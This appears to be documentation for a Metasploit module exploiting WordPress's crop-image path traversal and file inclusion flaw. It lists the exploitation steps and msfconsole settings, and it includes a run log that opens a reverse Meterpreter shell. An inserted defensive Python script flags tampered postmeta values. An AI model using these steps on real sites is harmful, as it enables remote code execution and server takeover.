On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion. An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.

## Exploitation Steps

- Upload an image containing PHP code
- Edit the `_wp_attached_file` entry from the `meta_input` `$_POST` array to specify an arbitrary path
- Perform the Path Traversal by using the `crop-image` WordPress function
- Perform the Local File Inclusion by creating a new WordPress post and setting the `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.

When visiting the post created by the attacker it is possible to obtain code execution.

More details can be found on the RIPS Technology Blog.
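The chain above leaves traces in two `wp_postmeta` keys the page names: `_wp_attached_file` (tampered via `meta_input` to carry a traversal path) and `_wp_page_template` (pointed at a cropped image instead of a theme template). The following audit script is an added example, not part of this module or of WordPress; it scans constructed sample postmeta rows and flags values that a stock WordPress install never writes. The character allowlist and the rule that a page template is either `default` or a theme-relative `.php` file are assumptions a site owner should adjust for their own install (for instance non-ASCII upload names).

```python
"""Audit WordPress postmeta rows for the two meta keys abused by the crop-image
path-traversal / LFI chain. Added example (not project code); sample rows are
constructed, not taken from a real site."""
import posixpath
import re
from typing import Iterable, List, Tuple

# Meta keys named on the page that the chain tampers with.
ATTACHED_FILE_KEY = "_wp_attached_file"
PAGE_TEMPLATE_KEY = "_wp_page_template"

# Assumption: a path WordPress writes itself is made of these characters only.
SAFE_PATH_RE = re.compile(r"^[A-Za-z0-9._/-]+$")

Row = Tuple[int, str, str]          # (post_id, meta_key, meta_value)
Finding = Tuple[int, str, str, str]  # (post_id, meta_key, meta_value, reason)


def path_is_suspicious(value: str) -> bool:
    """A legitimate WordPress relative path has no leading slash, no '..'
    segment, no null byte and no characters outside the allowlist."""
    if not value or value.startswith("/") or "\x00" in value:
        return True
    if not SAFE_PATH_RE.match(value):
        return True
    # Any '..' component climbs toward the parent directory; WordPress never
    # stores one in _wp_attached_file, whatever posixpath.normpath would say.
    return ".." in value.split("/")


def template_is_suspicious(value: str) -> bool:
    """_wp_page_template is 'default' or a theme-relative PHP template
    (assumption). A traversal path or an image filename is flagged."""
    if value == "default":
        return False
    if path_is_suspicious(value):
        return True
    return not posixpath.basename(value).lower().endswith(".php")


def audit(rows: Iterable[Row]) -> List[Finding]:
    """Return one finding per row whose value violates the expectation for its key."""
    findings: List[Finding] = []
    for post_id, key, value in rows:
        if key == ATTACHED_FILE_KEY and path_is_suspicious(value):
            findings.append((post_id, key, value,
                             "attached file path leaves the uploads dir or has odd characters"))
        elif key == PAGE_TEMPLATE_KEY and template_is_suspicious(value):
            findings.append((post_id, key, value,
                             "page template is not 'default' or a theme-relative .php file"))
    return findings


# Constructed sample rows (post_id, meta_key, meta_value) standing in for a
# `SELECT post_id, meta_key, meta_value FROM wp_postmeta` result.
SAMPLE_ROWS: List[Row] = [
    (10, "_wp_attached_file", "2019/03/photo.jpg"),                       # normal upload
    (11, "_wp_attached_file", "2019/03/photo.jpg/../../../../wp-content/themes/example/photo.jpg"),
    (20, "_wp_page_template", "default"),                                 # normal
    (21, "_wp_page_template", "templates/full-width.php"),                # normal
    (22, "_wp_page_template", "cropped-photo.jpg"),                       # image as template
    (23, "_wp_page_template", "../../uploads/2019/03/cropped-photo.jpg"),  # traversal
    (30, "_thumbnail_id", "11"),                                          # unrelated key
]


def suspicious_post_ids(rows: Iterable[Row]) -> List[int]:
    """Convenience wrapper: post ids of all flagged rows, in input order."""
    return [f[0] for f in audit(rows)]


if __name__ == "__main__":
    for post_id, key, value, reason in audit(SAMPLE_ROWS):
        print(f"post {post_id}: {key}={value!r}: {reason}")
```

Feed it the real rows (for example the output of `wp db query` or a direct query against `wp_postmeta`) and review every hit together with the post's author and revision history; on a patched install a hit still indicates tampering with data only an authenticated author-level account could have written.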
## Verification Steps

Confirm that functionality works:

- Start `msfconsole`
- `use exploit/multi/http/wp_crop_rce`
- Set the `RHOST`
- Set `USERNAME` and `PASSWORD`
- Set `LHOST` and `LPORT`
- Run the exploit: `run`
- Confirm you now have a meterpreter session
## Options

### THEME_DIR

The name of the theme WordPress is using. Used if the theme cannot be auto-detected.
## Scenarios

### Ubuntu 18.04 running WordPress 4.9.8

```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```